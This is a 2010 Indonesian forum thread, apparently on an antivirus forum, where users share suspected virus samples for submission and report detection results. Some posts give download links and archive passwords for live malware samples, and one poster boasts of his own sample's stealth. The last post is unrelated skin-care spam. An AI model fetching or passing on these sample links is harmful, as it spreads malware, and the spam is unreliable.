Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Mei 11, 2010, 07:22:54 AM
halo bro. knp ne virus gak di deteksi ma smadav
Yupt
File ini positif terkena virus Backdoor.Win32.Agent.ima
Hasil Scan dari KasPure
Pasti nanti akan diteliti dan dimasukan database smadav  :)
ow gitu ya bang. bisa jelasin lebih dtil ttg backdoor ga bro???
Coba lihat disini :)
http://www.securelist.com/en/descriptions/Backdoor.Win32.Agent.ima
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Mei 11, 2010, 10:46:51 AM
halo bro. knp ne virus gak di deteksi ma smadav
Yupt
File ini positif terkena virus Backdoor.Win32.Agent.ima
Hasil Scan dari KasPure
Pasti nanti akan diteliti dan dimasukan database smadav  :)
ow gitu ya bang. bisa jelasin lebih dtil ttg backdoor ga bro???
Coba lihat disini :)
http://www.securelist.com/en/descriptions/Backdoor.Win32.Agent.ima
bro kok isinya??
Backdoor.Win32.Agent.ima
Detected    May 19 2008 13:34 GMT
Released    May 26 2008 08:15 GMT

There is currently no description for this program

If you’d like to find out more about how programs of this type function, please read about the general behavior of programs in the same class or sub-class (see right).

Because many programs of this type are slight modifications of older versions, the descriptions for these older versions may be of interest. Links to any available descriptions are displayed under the general description on the right of the screen.

If you can’t find a suitable description on our site, you can get more help from the Contact Us section.

aq g ngerti
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Mei 11, 2010, 11:00:49 AM
@up
maksudnya penjelasan tentang backdoor ya...
coba perhatikan tulisan di sebelah kanan itu...Backdoors are designed to give malicious users remote control over an infected computer... bla....bla...bla....dst...dst...
mungkin itulah penjelasan dari backdoor...
cmiiw
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Mei 11, 2010, 11:42:32 AM
@up
maksudnya penjelasan tentang backdoor ya...
coba perhatikan tulisan di sebelah kanan itu...Backdoors are designed to give malicious users remote control over an infected computer... bla....bla...bla....dst...dst...
mungkin itulah penjelasan dari backdoor...
cmiiw
Yupt Menurutku itulah penjelasannya :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: DeepFreze6 pada Mei 12, 2010, 12:56:45 PM
ga tau nich virus apa bukan. tapi behaviornya ke detect sama smadav (behaviornya doang, bukan terdeteksi virus).
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Mei 12, 2010, 01:49:49 PM
ga tau nich virus apa bukan. tapi behaviornya ke detect sama smadav (behaviornya doang, bukan terdeteksi virus).
KasPur juga menditeksi melalui heurnya :D Trojan Heur
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: agus007 pada Mei 26, 2010, 08:36:34 AM
halo permisi....
coba dunk priksa nih firus...
gw donlot di 4shared dalm bentuk .rar,....
setelah di ekstrak, smadav ama NOD32 q sama2 kroyok tuh virus...
dibilang sih..
Smadav => New Heur.Variant (170)
NOD32 => disuruh submit nih virus ( g tau kemana)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Mei 27, 2010, 08:42:25 PM
halo bro. knp ne virus gak di deteksi ma smadav
Yupt
File ini positif terkena virus Backdoor.Win32.Agent.ima
Hasil Scan dari KasPure
Pasti nanti akan diteliti dan dimasukan database smadav  :)
ow gitu ya bang. bisa jelasin lebih dtil ttg backdoor ga bro???
Backdoor itu program yang dibuat dengan fungsi utama untuk menyediakan jalan masuk bagi hacker alias pintu belakang di komputer. Selain itu backdoor juga bisa ditumpangi malware lain seperti trojan, virus, dan worm.

Gitu kira - kira
halo permisi....
coba dunk priksa nih firus...
gw donlot di 4shared dalm bentuk .rar,....
setelah di ekstrak, smadav ama NOD32 q sama2 kroyok tuh virus...
dibilang sih..
Smadav => New Heur.Variant (170)
NOD32 => disuruh submit nih virus ( g tau kemana)
Sepertinya itu bukan virus.. Seperti tool untuk analisa program/file executable...
Tapi untuk meyakinkan sebaiknya di cross check terlebih dahulu ke produsen antivirus anda, dalam hal ini eset, via email ke samples@eset.com

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: usup pada Juni 06, 2010, 09:31:27 PM
setiap aku upload virus kok gak bisa dan ada tulisannya beginiERROR: Failed to find flength file,
mohon bantuannya...

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Juni 07, 2010, 01:45:30 AM
setiap aku upload virus kok gak bisa dan ada tulisannya beginiERROR: Failed to find flength file,
mohon bantuannya...



Thanks laporannya, sudah diperbaiki :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: edho pada Juni 14, 2010, 08:34:26 AM
Aq pnya virus yg tlh mnyerang kmputer aq dngn membanjirin smua folder aq dngan file sprti yg aq upload ini.
mhon pncerahannya untuk membasmi virus ini. Trims
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Juni 14, 2010, 08:41:49 AM
Aq pnya virus yg tlh mnyerang kmputer aq dngn membanjirin smua folder aq dngan file sprti yg aq upload ini.
mhon pncerahannya untuk membasmi virus ini. Trims
wah, tadi ane download uda kedetect sama NIS2010...
ini screenshotnya:
(http://i47.tinypic.com/2moz5t1.jpg)

klo mo liat hasil scanning virustoal.com, masuk sini:
http://www.virustotal.com/analisis/39591f9a2bac678781a9034e0440adb909fbe691fed46cd961d618404adfe629-1276479953
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada Juni 14, 2010, 08:51:36 AM
Iya, wktu DL jg lngsung diblok ma avast gw didetek sbg W32/Runouce B atau jg dikenal sbg W32.Chir B spt yg dktakan bro The Gugel diatas. Cb di scan pke AVS-32 AV bro, dlu smpet mbenerin laptop tmen2 gw yg kena ni virus bs di clean ma AVS-32. Slmt mencoba :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Kill All Viruses pada Juni 23, 2010, 04:33:45 PM
Nih Brow........
Ma Avira Detected As Virus Gitu.............
Nih Virus pake ICON AVIRA........!!!!!!!!
Namanya Juga...........!!!!!!
sma smadav tdak terdeteksi APAPUN......!!!!!!!
efeknya restart explorer trus.......
sama Virus Doctor sdah dmsukan Database......... :D,
sya nemu di lab komp. sklah.......
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Juni 24, 2010, 02:33:45 PM
Smadav Belum detec nih :D
Nod32+KIS2011 juga belum  ;D
Silahkan
http://www.virustotal.com/analisis/4f2fd22b89b800bb62c823e8e6d93dd8834f459caf360df45e72b13058d85d97-1277364459
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Juni 24, 2010, 08:15:16 PM
gan plisss bantu ane. kompi ane kna ne virus n sulit ilangnya http://shafry.byethost12.com/Download/download.php?id-file=9
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Juni 28, 2010, 04:51:16 PM
Komputer gw kena trojan,,
suka restart diawal, muncul shutdown box 1minute,,
bisa dicancel siih melalui CMD,,

gw gak pakai AV apapun,, kadang cuman smadav,,
Virus/Trojan ini bernama Cybergate.exe,, klo nyari di google ngarahnya ke C-Gate.com
dia buat bersembunyi di c:/windows/cybergate (induknya gak tau sembunyi dimana)

kyaknya gw install AV impor dulu deh,,
mana tau data2 gw pada kecolongan keluar,,

Smadav kan mau Go Internasional, berarti harusnya uda mulai deteksi hal semacam ini donk,,

(1 hal lg, gw heran, gak tau apa kompi gw yg error,, klo namanya cybergate.exe gak bs diupload)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Cr4sh pada Juni 28, 2010, 05:08:21 PM
kompie ku ada masalah nih mastah2 semua, kompi aku gak mau mati2, padahal udah di shut down, tetp aja gak mau mati, apakah itu virus ? terima kasih apabila mastah2 mau menjawab ...  ^:)^ ^:)^ ^:)^

ooya, sudah saya scan sama avg is sama ess, tapi hasilnya nihilll ...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada Juni 28, 2010, 05:33:21 PM
@ Harboot...

Terdeteksi ESET


(http://i49.tinypic.com/9fmqeo.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Juni 28, 2010, 05:43:58 PM
@harboot
ane scan pake NIS2010, terdetekdi sbg Trojan.Gen
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Juni 29, 2010, 01:48:03 AM
 :D terdeteksi oleh avast jadul  ;> 4.8pro
(http://farm5.static.flickr.com/4098/4742694197_a89a9bd54c_b.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Juni 29, 2010, 03:36:52 AM
@all,,
uda gw upload virustotal koq,,
emank byk terdeteksi sbg trojan,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Juni 29, 2010, 04:19:52 PM
. tolong ne pc gw kna virus gak tw apa namanya dia prosesnya aq lihat di smadav gak bisa. n q scan ternyata dia mencopykan dirinya ke setiap folder yang ada. dan ngrubah registry dan apa lagi lah efeknya aq lupa. tolong ya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Juni 29, 2010, 04:29:22 PM
@up:
barusan ane scan pake MSE update hari ini, kedetect tuch...

(http://i48.tinypic.com/fondj6.jpg)

ini log nya :

Items:
containerfile:C:\Windows Cracker.zip
file:C:\Windows Cracker.zip->Windows Cracker.exe->(UPX)->(VFS:AhGen5.db)->(UPX)->[RSRCEmb]#1
file:C:\Windows Cracker.zip->Windows Cracker.exe->(UPX)->[RSRCEmb]#1
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada Juni 29, 2010, 04:49:53 PM
(http://i46.tinypic.com/no9gr6.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Juni 30, 2010, 09:51:19 AM
. tolong ne pc gw kna virus gak tw apa namanya dia prosesnya aq lihat di smadav gak bisa. n q scan ternyata dia mencopykan dirinya ke setiap folder yang ada. dan ngrubah registry dan apa lagi lah efeknya aq lupa. tolong ya
sama avast 5pro langsung diblok  :'( :'( :'( :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Juni 30, 2010, 12:11:49 PM
. tolong ne pc gw kna virus gak tw apa namanya dia prosesnya aq lihat di smadav gak bisa. n q scan ternyata dia mencopykan dirinya ke setiap folder yang ada. dan ngrubah registry dan apa lagi lah efeknya aq lupa. tolong ya
hehe... shafry.., masa yg bikin virus kena virus juga...  pake Avast shaf, pke yg free aja.

gimana fitur stealth nya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Juni 30, 2010, 03:30:15 PM
gak terdeteksi sama smadav??
klo dia copy diri ke setiap folder, registry,,
seharusnya secara heuristic smadav bisa mencurigai dia,,

klo smadav detek, upload log-nya kesini,,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Juni 30, 2010, 04:05:22 PM
owh ya ane pake avast udah bisa ke detek.
n klo ma smadav klo udah ke buka gak bisa mati mas walau udah di kill

@Yudha Stealthnya mantap tuh punyaq. tapi ......
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Juli 02, 2010, 07:13:15 AM
Info Jenis Virus Baru !!!

Sampel virus ini saya ambil dari Morphic Karta

Keterangan:
filename file ini adalah fanny.bmp
atribut aslinya seolah-olah di atas superhidden.

file ini tidak butuh autorun untuk aktif.
file ini tidak butuh double klik untuk menginfeksi komputer.

sahabat dan teman seperjuangan,
Morphic Karta
29 Juni 2010

Virus ini sudah saya cek di virustotal.com dan ternyata hampir semua antivirus menditeksi-nya, tp ada beberapa antivirus belum bisa menditeksi.

Buat yang pengguna NOD32 Antivirus dan ESET Smart Security segera di perbaharui database Eset antivirusnya.
sebelumnya eset belum bisa menditeksi keberadaan virus ini, tp setelah sampelnya saya kirim ke eset barulah tadi malam, virus fanny.bmp dikenali oleh EAV dan ESS sebagai virus Win32/Agent.OSW trojan.

ok buat yang mau download database EAV dan ESS (Offline) bisa di www.milomenz.blogspot.com (Update Antivirus). :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Juli 02, 2010, 07:32:44 AM
komandan....uda ane scan pake NIS2010, kedetect...

ini skrinshut nya...
(http://i50.tinypic.com/20uznsh.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MacGyver_C2694 pada Juli 02, 2010, 02:06:42 PM
 :) hasil scan MSE http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=TrojanDownloader%3aWin32%2fZlob&threatid=14029652
hasil boot scan avast5
(http://farm5.static.flickr.com/4123/4753929421_cb206464dd_b.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Juli 02, 2010, 02:14:00 PM
Eset SMart Security detec :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: anehbgt pada Juli 05, 2010, 11:57:36 AM
laporan ni..entah false alarm ato emg virus?
soalnya KIS 2011 gw kaga nge detect ni file sbgai sality + dah gw scan pk sality killer >.<

ada lagi detect an smadav d flashdisk gw (installer Windows) tp flashdisk na lagi di bawa kawan gw
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rizzal pada Juli 05, 2010, 12:26:23 PM
@up
File itu pernah di disinfected ya?
Kalo iya Smadav memang gitu :D
2 game ku juga di detec sality kok ;D

hasil Scan eset=File file mu itu bersih :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: anehbgt pada Juli 05, 2010, 01:00:09 PM
gag pernah di disinfect kok..emg gitu adanya >.<

soalnya tu program trading bokap..klo tiba" di delete ma smadav bisa di marah"in wkwk~

ok"

thx~
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Juli 07, 2010, 12:01:04 PM
mas - mas yang jadi makernya smadav tolong avnya di perkuat dunk. q udah analisa virus ahgen5 tidak bisa di kill prosesnya n ktika q buka smadav behavior bru muncul setelah si virus aktif. aq udah kasih sampel n screenshotnya. tolonga di perbaiki ya

pass : vir
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Juli 07, 2010, 12:06:42 PM
mas - mas yang jadi makernya smadav tolong avnya di perkuat dunk. q udah analisa virus ahgen5 tidak bisa di kill prosesnya n ktika q buka smadav behavior bru muncul setelah si virus aktif. aq udah kasih sampel n screenshotnya. tolonga di perbaiki ya

pass : vir

bahaya juga nih virusnya bro...  virus lokal ya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Juli 07, 2010, 12:38:28 PM
mas - mas yang jadi makernya smadav tolong avnya di perkuat dunk. q udah analisa virus ahgen5 tidak bisa di kill prosesnya n ktika q buka smadav behavior bru muncul setelah si virus aktif. aq udah kasih sampel n screenshotnya. tolonga di perbaiki ya

pass : vir
sample virusnya sudah ane upload ke http://smadav.net/index.php?page=upload
tadi ane scan pake MSE, terdeteksi sebagai TrojanDropper:Win32/VB.YCF

di scan pake smadav rev.8.2 = blm terdeteksi
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Shafry(virusanalyst) pada Juli 07, 2010, 01:56:02 PM
mas - mas yang jadi makernya smadav tolong avnya di perkuat dunk. q udah analisa virus ahgen5 tidak bisa di kill prosesnya n ktika q buka smadav behavior bru muncul setelah si virus aktif. aq udah kasih sampel n screenshotnya. tolonga di perbaiki ya

pass : vir
sample virusnya sudah ane upload ke http://smadav.net/index.php?page=upload
tadi ane scan pake MSE, terdeteksi sebagai TrojanDropper:Win32/VB.YCF

di scan pake smadav rev.8.2 = blm terdeteksi
@yudh
yup benr bgt  :D :D :D :D
@The Gugel
ya smadav juga udah bisa klo ane suspected by user. tapi juga gitu gak bisa di kill klo aktip
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ded pada Juli 23, 2010, 09:05:10 PM
 ~x(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Juli 23, 2010, 10:47:29 PM
koq htm semua siih??
double extension yaa?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Juli 26, 2010, 07:29:19 PM
Varian Virut.... nih sampelnya.. :)

passwordnya : "yudha"
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 26, 2010, 07:45:39 PM
@para VISER
helep donk.. ^:)^
eh ia bro ryan.. :D
neh hobi lo kan  :-bd
(http://i27.tinypic.com/jtozf5.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Juli 26, 2010, 07:47:59 PM
sampelnya sekalian di attach bro... :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 26, 2010, 07:57:25 PM
sampelnya sekalian di attach bro... :)
waduh gw lom tau bro caranya  :-[
ajarin please  ^:)^
baru bisa ngasih SS keq gtu  ;D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: telkomek pada Juli 29, 2010, 11:51:55 AM
virus apa?
3d merry christmas.scr -> keygennya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada Juli 29, 2010, 03:21:24 PM
@PhaMenThaR™
coba deh pke fitur virus by user :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Juli 29, 2010, 10:07:31 PM
@PhaMenThaR™
coba deh pke fitur virus by user :D
fitur virus by user?
maksudnya gmn tuh bro ajojing?
sory kalo masalah virus2an gw paling ga tau bro, yg gw tau pake AV kalo ke detect da virus clean or delete tuh aja..
masih lom tau uploada virus or sample nya :o
makanya gw mohon bimbingan dari para PaTi  ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: madorgiv pada Juli 30, 2010, 10:54:08 AM
Pliss tolongin gw ne.. komp gw kejangkit new heur level 9.. nah udah kedetect tapi ga bisa di hapus.. skarang dah mulai ngeblock task manager gw and regedit.. trus gw ga bisa ngopy file and install/uninstall.. please help me.. mana pas lg deadlin pula ne kerjaan gw... tlong jawabannya secepatnya yaa :( :((
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: anton_kowoex pada Agustus 01, 2010, 09:28:37 AM
kawan2 tolong donk,
komputer saya kena virus yang belum saya ketahui nama dan jenisnya
indikasinya virus tsb membuat shortcut di setiap folder yang ada di hard disk
shortcut yang pasti muncul adalah 'Aplikasi', 'Microsoft', 'Music' dan shortcut nama folder yang ada di dalam folder tsb
minta tolong donk antivirusnya...

terima kasih
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PraskaOkey pada Agustus 01, 2010, 09:30:41 AM
kawan2 tolong donk,
komputer saya kena virus yang belum saya ketahui nama dan jenisnya
indikasinya virus tsb membuat shortcut di setiap folder yang ada di hard disk
shortcut yang pasti muncul adalah 'Aplikasi', 'Microsoft', 'Music' dan shortcut nama folder yang ada di dalam folder tsb
minta tolong donk antivirusnya...

terima kasih

Itu sih gampang.. Scan pake Smadav aja.. :D
Klo masih ga bisa, pake Morphost AV.. <=)
download di http://www.morphostlab.co.nr (http://www.morphostlab.co.nr)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Agustus 01, 2010, 09:58:26 AM
kawan2 tolong donk,
komputer saya kena virus yang belum saya ketahui nama dan jenisnya
indikasinya virus tsb membuat shortcut di setiap folder yang ada di hard disk
shortcut yang pasti muncul adalah 'Aplikasi', 'Microsoft', 'Music' dan shortcut nama folder yang ada di dalam folder tsb
minta tolong donk antivirusnya...

terima kasih

Itu sih gampang.. Scan pake Smadav aja.. :D
Klo masih ga bisa, pake Morphost AV.. <=)
download di http://www.morphostlab.co.nr (http://www.morphostlab.co.nr)

smadav belum bisa mendeteksinya. pakai Morphost udah bisa. namanya virus Fake Shortcut. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: anton_kowoex pada Agustus 01, 2010, 10:09:38 AM
terima kasih bro.. :-X :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: anton_kowoex pada Agustus 02, 2010, 03:56:55 AM
kawan2 tolong donk,
komputer saya kena virus yang belum saya ketahui nama dan jenisnya
indikasinya virus tsb membuat shortcut di setiap folder yang ada di hard disk
shortcut yang pasti muncul adalah 'Aplikasi', 'Microsoft', 'Music' dan shortcut nama folder yang ada di dalam folder tsb
minta tolong donk antivirusnya...

terima kasih

Itu sih gampang.. Scan pake Smadav aja.. :D
Klo masih ga bisa, pake Morphost AV.. <=)
download di http://www.morphostlab.co.nr (http://www.morphostlab.co.nr)

smadav belum bisa mendeteksinya. pakai Morphost udah bisa. namanya virus Fake Shortcut. :D

Terima kasih atas infonya kawan2 dan saya sdh menggunakan AV Morphost untuk mendeteksi virus tsb
Namun masih ada permasalahan, yaitu setiap saya mematikan komp dan menyalakannya lagi stlh bbrp waktu
shortcut2 tsb muncul kembali seperti semula dan di dalam desktop saya ada shortcut 'serviks' yang tdk dapat dihilangkan
Skali lagi mohon bantuan kawan2 untuk solusinya.
Terimakasih
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Agustus 02, 2010, 01:07:22 PM
Sampel lagi Virus autorun
 :)

http://www.sendspace.com/file/fbrunp

pass. nya  "yudha"
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Agustus 02, 2010, 01:14:58 PM
Sampel lagi Virus autorun
 :)

http://www.sendspace.com/file/fbrunp

pass. nya  "yudha"
Langsung sedot.. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada Agustus 02, 2010, 01:18:57 PM
Sampel lagi Virus autorun
 :)

http://www.sendspace.com/file/fbrunp

pass. nya  "yudha"
Langsung sedot.. :D

ok... picture nya cakep ya gambar Love. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: madorgiv pada Agustus 03, 2010, 07:30:52 PM
jiah gw ga ada yang bantuin ne ... hiks.. :( ~x(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: telkomek pada Agustus 05, 2010, 10:43:09 AM
virus apa ini?
bahayanya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 10, 2010, 01:24:32 PM
@all
neh virus apa ya?
C:\Windows\Temp\nav1D2B.tmp->(AutoIT)->AutoIT_Script->(UTF-16LE)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Agustus 10, 2010, 01:27:01 PM
@all
neh virus apa ya?
C:\Windows\Temp\nav1D2B.tmp->(AutoIT)->AutoIT_Script->(UTF-16LE)
ada sampel virus ngk ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 10, 2010, 01:36:19 PM
@all
neh virus apa ya?
C:\Windows\Temp\nav1D2B.tmp->(AutoIT)->AutoIT_Script->(UTF-16LE)
ada sampel virus ngk ???
nah itu dy bro yg gw lom tau cara nya ngirim sample nya :-[
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Agustus 10, 2010, 01:40:11 PM
@all
neh virus apa ya?
C:\Windows\Temp\nav1D2B.tmp->(AutoIT)->AutoIT_Script->(UTF-16LE)
ada sampel virus ngk ???
nah itu dy bro yg gw lom tau cara nya ngirim sample nya :-[
cari file yang dianggap virus, lalu file virusnya zip/rar terus upload kesini atau ngk upload ke:
http://www.4shared.com/dir/yXu7eYRG/Upload_Virus.html
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: teambuddies pada Agustus 14, 2010, 04:50:17 PM
@all
neh virus apa ya?
C:\Windows\Temp\nav1D2B.tmp->(AutoIT)->AutoIT_Script->(UTF-16LE)

Autoit? Bukannya virus autoit ya?
SMADAV bisa hilangin, tapi nggak semuanya.

Soalnya autoit itu selalu berbeda icon, nama, ukuran. Smadav untuk sementara bisa nemu 8 jenis Autotit.
Yang asli lebih banyak.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 14, 2010, 08:50:51 PM
@all
neh virus apa ya?
C:\Windows\Temp\nav1D2B.tmp->(AutoIT)->AutoIT_Script->(UTF-16LE)

Autoit? Bukannya virus autoit ya?
SMADAV bisa hilangin, tapi nggak semuanya.

Soalnya autoit itu selalu berbeda icon, nama, ukuran. Smadav untuk sementara bisa nemu 8 jenis Autotit.
Yang asli lebih banyak.
waktu kemaren tuh yg detect MSE  :-bd
trus langsung deh di clear  :D
tapi itu masalahnya gw lom sempat upload sample virus nya  :o
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Andi_Evandy pada Agustus 14, 2010, 10:15:54 PM
Upload Smadav 8.6 (Smadav+Virus) ;D ;D ;D
Dapet dari 4shared.com...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: somersault11 pada Agustus 17, 2010, 10:50:03 AM
Tolong!!!!  :'( :'( :'( :'( :'( :'( :'(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: hatjulhasbi pada Agustus 17, 2010, 04:25:02 PM
@up kenapa?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: The Gugel pada Agustus 17, 2010, 04:38:39 PM
Tolong!!!!  :'( :'( :'( :'( :'( :'( :'(
sudah bisa di deteksi oleh NIS2010
(http://i35.tinypic.com/1z38e3l.jpg)


Upload Smadav 8.6 (Smadav+Virus) ;D ;D ;D
Dapet dari 4shared.com...
sudah bisa di deteksi oleh NIS2010
(http://i37.tinypic.com/2cnji0x.jpg)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: somersault11 pada Agustus 17, 2010, 08:14:23 PM
gak pake NIS kk,,  :( :( :( :(
spec na ga kuat,,
komp kantor jadul pula, pentium 4 + ram 256 doank,,  :o :o :o :o :o
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 17, 2010, 08:51:15 PM
Tolong!!!!  :'( :'( :'( :'( :'( :'( :'(
sudah bisa di deteksi oleh NIS2010
(http://i35.tinypic.com/1z38e3l.jpg)


Upload Smadav 8.6 (Smadav+Virus) ;D ;D ;D
Dapet dari 4shared.com...
sudah bisa di deteksi oleh NIS2010
(http://i37.tinypic.com/2cnji0x.jpg)
salut dah buat NIS  :-X :-X :-X :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: somersault11 pada Agustus 19, 2010, 01:57:44 PM
Lagi2 W32.Changup,, ini virus apa an si??   :o :o :o :o

Avira mengikuti jejak NIS 2010

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: PhaMenThaR pada Agustus 19, 2010, 11:02:57 PM
Click here! skin care (http://skincare911atlanta.blogspot.com/)


Acnezine is a #1 rated all-natural approach to curing acne from the inside-where  Acnezine is an internal cleansing system that goes right to that source to fight acne and Skin lotions and sunscreens are those health and beauty products that ought to make up the next stage of your facial care routine as these items rejuvenate Skin Care Austin. Are you happy in your skin or does it feel dry and uncomfortable? As winter bites many people have to deal with dry, itchy and irritated skin. Complete Your Skin Care Regime With The Exposed Microderm Scrub  skin type and age group to reduce, eliminate and prevent acne related problems. Exposed Acne treatment Beauty is like by everyone and also each of persons survive in world like to have certain different style than others.  Health acne skin care, back acne treatment, skin care Acnezine is a treatment that only requires regular application of the cream on the area afflicted by acne.  The active ingredient in Acnezine is benzoyl peroxide, a substance Acnezine Treatment Curing in a Fast Way. Thursday, July 8th, 2010 at 2:03 pm. Leave your  Acnezine Treatment 0. This blog copyright В© Acnezine Treatment My Acnezine Review. To properly review the benefits of acnezine and to get a better idea out of it, to try and understand what makes it different, We have cheap Skin Care from Skin Careas well as Other. Vist us for all your Skin Care needs and supplies Skin care acne treatment is one of the most misunderstood topics there is when it comes to acne skin care. Many people feel that problem acne is obagi skin care  (http://skincaretoday.bfora.com/) Learn about the best acne skin care treatment such as Aramis, Omnilux, Chemical Peels and Microdermabrasion in Mequon, Wisconsin Acnezine is an acne system that also doubles as an acne scar solution.  The Acnezine system claims to help individuals who have a problem with their Skin care acne treatment is one of the most misunderstood topics there is when it comes to acne skin care. Many people feel that problem acne is Skin care guide provides information, tips, skin treatment and resources for skin care, beauty care, cosmetic surgery, infections, herpes, skin cancer, psoriasis etc. Acne Skin Care Treatment Products,results of accutane treatment,acne scar removal,acne scalp,pill acne treatment,severe acne treatments Natural organic facial skin care products including facial cleansers, facial toners, facial creams, moisturizers, an more. AcneSkinCareProduct.Org review of the acne treatment product Acnezine formerly known as Acuzine We sell all of the La Roche Posay and Biomedic skin care products, including those used by people with normal, hypersensitive, hyperpigmented, environmentally Treating acne with Revitol Acnezine Acne Treatment.  Acnezine provides both clearing the existing lesions and preventing formation of new ones and is appropriate Thinking about beautiful skin, most people think first of all about skin care cosmetics and beauty skin care.  Skin care products for adults and for children are different.
acne care skin (http://www.sanrokemtb.com/phpBB3/viewtopic.php?f=2&t=13807)
acne care for asian skin (http://cityagenda.ca/viewtopic.php?f=11&t=118653)
advanced skin care (http://www.bkk-aoc.com/forum/index.php?topic=2550.new#new)
acne care laser skin treatment (http://www.el-escriba.com/modules.php?name=Forums&file=viewtopic&p=2796#2796)
c care cellex product skin (http://forum.szejgis.net/viewtopic.php?f=2&t=5252)
